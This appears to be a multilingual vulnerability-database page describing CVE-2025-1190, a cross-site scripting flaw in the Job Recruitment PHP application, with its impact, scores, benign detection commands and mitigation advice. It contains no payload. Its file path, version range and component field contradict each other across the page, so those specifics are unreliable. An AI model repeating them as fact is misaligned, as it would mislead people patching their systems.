プラットフォーム
php
コンポーネント
cve-2025-x
修正版
1.0.1
A problematic cross-site scripting (XSS) vulnerability has been identified in code-projects Job Recruitment versions 1.0 through 1.0. This flaw allows attackers to inject malicious scripts, potentially compromising user sessions and data integrity. The vulnerability resides within the /parse/loaduser-profile.php file and can be exploited remotely. A patch is available in version 1.0.1.
Successful exploitation of CVE-2025-1190 allows an attacker to execute arbitrary JavaScript code within the context of a user's browser session. This can lead to various malicious actions, including session hijacking, credential theft, and defacement of the Job Recruitment application. The attacker could potentially steal sensitive user data, such as login credentials or personal information, and use it for further malicious purposes. The impact is amplified if the application is used to manage sensitive job applicant data.
CVE-2025-1190 was publicly disclosed on 2025-02-12. No public proof-of-concept (PoC) code has been identified at the time of writing. The CVSS score of 3.5 (LOW) indicates a relatively low probability of exploitation, but the potential impact warrants prompt remediation. This vulnerability is not currently listed on the CISA KEV catalog.
Organizations utilizing code-projects Job Recruitment version 1.0 and 1.0 are at risk. This includes businesses using the application for recruitment processes, particularly those with sensitive applicant data. Shared hosting environments where Job Recruitment is installed are also at increased risk due to potential cross-tenant vulnerabilities.
• php / web:
grep -r "load_user-profile.php" /var/www/html/• generic web:
curl -I http://your-job-recruitment-site.com/_parse/load_user-profile.php | grep -i "X-Powered-By"disclosure
エクスプロイト状況
EPSS
0.28% (51% パーセンタイル)
CISA SSVC
CVSS ベクトル
The primary mitigation for CVE-2025-1190 is to upgrade Job Recruitment to version 1.0.1 or later, which contains the necessary fix. If upgrading is not immediately feasible, consider implementing input validation and output encoding on the /parse/loaduser-profile.php file to sanitize user-supplied data. Web application firewalls (WAFs) configured to detect and block XSS attacks can also provide a temporary layer of protection. Regularly review and update security configurations to minimize the attack surface.
Actualizar a una versión parcheada o aplicar las medidas de seguridad proporcionadas por el proveedor. Escapar o limpiar las entradas de usuario en `/parse/load_user-profile.php` para prevenir la inyección de código malicioso. Validar y sanitizar todos los parámetros de entrada para evitar ataques XSS.
脆弱性分析と重要アラートをメールでお届けします。
CVE-2025-1190 is a cross-site scripting (XSS) vulnerability affecting Job Recruitment versions 1.0 through 1.0, allowing attackers to inject malicious scripts.
Yes, if you are using Job Recruitment version 1.0 or 1.0, you are affected by this vulnerability and should upgrade immediately.
Upgrade Job Recruitment to version 1.0.1 or later. As a temporary workaround, implement input validation and output encoding.
No active exploitation has been confirmed at this time, but prompt remediation is still recommended.
Refer to the code-projects website or security mailing lists for the official advisory regarding CVE-2025-1190.